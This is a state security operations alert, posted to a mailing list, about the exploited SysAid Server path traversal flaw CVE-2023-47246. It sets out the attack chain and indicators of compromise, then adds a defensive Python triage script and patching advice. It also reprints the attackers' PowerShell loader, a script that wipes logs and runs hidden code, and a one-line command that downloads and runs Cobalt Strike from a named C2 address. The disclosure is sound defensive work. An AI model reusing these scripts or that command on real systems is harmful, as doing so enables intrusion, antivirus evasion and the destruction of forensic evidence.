[CDP-development] TLP:GREEN - (Vulnerability Alert Notification) - CVE-2023-47246 SysAid Server Path Traversal Vulnerability
CSS Security Operations Services * DAS
css-soc-services at das.oregon.gov
Mon Nov 13 10:20:55 PST 2023
Good morning,
The SOC Services team is reporting on the vulnerability CVE-2023-47246, SysAid Server Path Traversal Vulnerability. Due to its high visibility and our knowledge of the software installed in the state environment, we are providing this in-depth information:
History: On November 8, 2023, SysAid published an advisory stating that its on-premise server software had a previously undisclosed vulnerability and that it was aware of public in-the-wild exploitation. Days prior, Microsoft had notified SysAid of the issue and attributed the compromises to TA505 "Lace Tempest", often known as the cl0p ransomware gang. On November 13, 2023, CISA added CVE-2023-47246 to the Known Exploited Vulnerabilities Catalog.
The following products are affected:
* SysAid Server prior to 23.3.36
Fixed version:
* SysAid Server 23.3.36
SysAid has provided an advisory which can be found here: https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Intelligence: As of November 8, 2023, the vulnerability has been confirmed as being exploited in the wild.
Workarounds: There are no workarounds at this time.
How it works: The attacker uploads a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service. The attacker then uses a PowerShell script to deploy the WebShell, which executes a malware loader named user.exe; the loader loads the GraceWire trojan and injects it into one of the processes listed below:
* Spoolsv.exe
* msiexec.exe
* svchost.exe
After initial access, the attackers used a second PowerShell script to erase evidence of their actions from the disk and from the SysAid on-prem server web logs.
The following PowerShell script was used to launch the user.exe loader:
$wapps='C:\Program Files\SysAidServer\tomcat\webapps'
dir "$wapps\usersfiles"
$bp=0
foreach($s in tasklist) {
if ($s -match '^(Sophos).*\.exe\s') {echo $s; $bp++;}
}
if ($bp) { echo "`nSTOP-PROCs FOUND! Exiting`n" }
else {
echo "Starting user.exe"
& "$wapps\usersfiles\user.exe"
}
Start-Sleep 1
Remove-Item -Force "$wapps\usersfiles.war"
Remove-Item -Force "$wapps\usersfiles\user.*"
exi
The script performs the following actions:
* Lists all files placed in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory.
* Checks all running processes for any whose name begins with "Sophos" and, if one is found, exits.
* If no matching processes are found, starts the user.exe malware.
* Pauses for one second, then removes the files used during the attack: the usersfiles.war file and any files matching C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.*
The following PowerShell script was used to erase evidence:
$tomcat_dir = "E:\SysAidServer\tomcat";
$log4j_dir = "E:\SysAidServer\root\WEB-INF\logs";
$log4jPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731";
$tcPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731";
function cleanLL {
$fl = Get-ChildItem "$log4j_dir";
for ($i=0; $i -lt $fl.Count; $i++) {
$logFile = $fl[$i].FullName;
if (Select-String -Pattern "$log4jPattern" -Path "$logFile") {
Get-Content -Path "$logFile" | Select-String -Pattern "$log4jPattern" -NotMatch | Set-Content -Path "$logFile.bck";
cp "$logFile.bck" "$logFile"
}
}
$fl = Get-ChildItem "$tomcat_dir\logs\";
for ($i=0; $i -lt $fl.Count; $i++) {
$logFile = $fl[$i].FullName;
if (Select-String -Pattern "$tcPattern" -Path "$logFile") {
Get-Content -Path "$logFile" | Select-String -Pattern "$tcPattern" -NotMatch | Set-Content -Path "$logFile.bck";
cp "$logFile.bck" "$logFile"
}
}
}
sleep 5;
cleanLL;
while(1) {
sleep 5;
if(!(Test-Path "$tomcat_dir\webapps\usersfiles.war")) {
while((Test-Path "$tomcat_dir\webapps\usersfiles")) {
sleep 1;
}
cleanLL;
break;
}
if((Test-Path "$tomcat_dir\webapps\usersfiles\leave")) {
Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave";
sleep 5;
cleanLL;
break;
}
else {
cleanLL;
}
$s=$env:SehCore;$env:SehCore="";Invoke-Expression $s;
The script performs the following actions:
* Sleeps for 5 seconds to allow the exploit to complete fully.
* Removes any lines in log files within the SysAidServer\root\WEB-INF\logs and SysAidServer\tomcat\logs directories that match the following pattern (the script defines it twice, as $log4jPattern and $tcPattern, with identical content):
* userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731
* Loops every 5 seconds, repeating the log cleaning until the usersfiles.war file and the usersfiles directory are gone, or until a file named leave appears in the usersfiles directory, which it deletes before a final cleaning pass.
* Finally reads further PowerShell code from the SehCore environment variable, clears that variable, and executes the code with Invoke-Expression.
The following PowerShell command was used to download and execute a CobaltStrike listener on victim hosts:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a')
Post-Exploit: Indicators of compromise can be found below:
Hashes
Filename | Sha256 | Comment
User.exe | b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d | Malicious loader
IP Addresses
IP | Comment
81.19.138[.]52 | GraceWire Loader C2
45.182.189[.]100 | GraceWire Loader C2
179.60.150[.]34 | Cobalt Strike C2
45.155.37[.]105 | Meshagent remote admin tool C2
File Paths
Path | Comment
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe | GraceWire
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war | Archive of WebShells and tools used by the attacker
C:\Program Files\SysAidServer\tomcat\webapps\leave | Used as a flag for the attacker scripts during execution
Antivirus Detections
Microsoft Defender detects the components of this attack as the following threats:
* Trojan:Win32/TurtleLoader
* Backdoor:Win32/Clop
* Ransom:Win32/Clop
Post-Compromise Cleanup
After initial compromise, the attacker cleans up the payloads used to establish the initial foothold on the infected servers. Evidence of the following commands having been run on SysAid servers indicates successful exploitation:
Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave"
Remove-Item -Force "$wapps\usersfiles.war"
Remove-Item -Force "$wapps\usersfiles\user.*"
& "$wapps\usersfiles\user.exe"
As of November 13, 2023, there are no Tenable plugins for this vulnerability, nor any in the pipeline.
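As an added defender-side example (not part of this advisory or of SysAid's own tooling), the following Python triage helper checks a SysAidServer install root for the artifacts described above: the dropped usersfiles.war, user.exe and leave files, the .bck copies that the attacker's cleanLL function writes beside each log it filters and never deletes, and any log lines still matching the attacker's own cleanup regex. The install root layout, the log file names and the sample log contents used by build_sample_install are assumptions constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Regex copied from the attacker's cleanLL script above: a line still matching it in a
# live log means the cleanup did not run (or has not run yet) against that file.
CLEANUP_PATTERN = re.compile(
    r"userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731")
# Files the attacker scripts drop, relative to the SysAidServer install root (assumed).
DROPPED_PATHS = ["tomcat/webapps/usersfiles.war", "tomcat/webapps/usersfiles/user.exe",
                 "tomcat/webapps/usersfiles/leave", "tomcat/webapps/leave"]
LOG_DIRS = ["tomcat/logs", "root/WEB-INF/logs"]

def triage(root):
    """Return (kind, relative_path) findings for one SysAidServer install root."""
    root, findings = Path(root), []
    for rel in DROPPED_PATHS:
        if (root / rel).exists():
            findings.append(("dropped_file", rel))
    for rel in LOG_DIRS:
        for f in sorted(p for p in (root / rel).glob("*") if p.is_file()):
            # cleanLL writes the filtered log to "<log>.bck" and copies it back over the
            # original but never deletes the .bck copy, so it is a durable artifact.
            if f.suffix == ".bck":
                findings.append(("cleanup_backup", f"{rel}/{f.name}"))
                continue
            lines = f.read_text(encoding="utf-8", errors="replace").splitlines()
            for n, line in enumerate(lines, 1):
                if CLEANUP_PATTERN.search(line):
                    findings.append(("uncleaned_log_line", f"{rel}/{f.name}:{n}"))
    return findings

def build_sample_install(root):
    """Constructed sample tree (not real data) mimicking a post-exploitation host."""
    root = Path(root)
    (root / "tomcat/webapps/usersfiles").mkdir(parents=True)
    (root / "tomcat/webapps/usersfiles.war").write_bytes(b"PK-constructed")
    (root / "tomcat/webapps/usersfiles/user.exe").write_bytes(b"MZ-constructed")
    for rel in LOG_DIRS:
        (root / rel).mkdir(parents=True)
    # Access log already processed by cleanLL: the .bck copy is left behind.
    for name in ("localhost_access_log.txt", "localhost_access_log.txt.bck"):
        (root / "tomcat/logs" / name).write_text("GET /index.jsp 200\n")
    # Application log the cleanup script has not touched yet (constructed line).
    (root / "root/WEB-INF/logs/sysaid.log").write_text("INFO startup\nWARN userentry upload\n")

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_install(tmp)
        return triage(tmp)
```

Point triage() at the real install root (for example C:\Program Files\SysAidServer) and treat any cleanup_backup or dropped_file finding as a trigger for full forensic collection before patching.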
Recommended Actions:
* Verify the host has not been compromised before applying patches.
* Apply the appropriate updates provided by the vendor to vulnerable systems immediately after appropriate testing.
* Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
* Apply the Principle of Least Privilege to all systems and services.
Cyber Security Services
State of Oregon Cyber Security Services
Enterprise Information Services | SOC
Cyber Security Services (CSS)
SOC Hotline: (503) 378-5930 | SOC Services (503) 373-0378
"Ensuring user-friendly, reliable and secure state technology systems that serve Oregonians."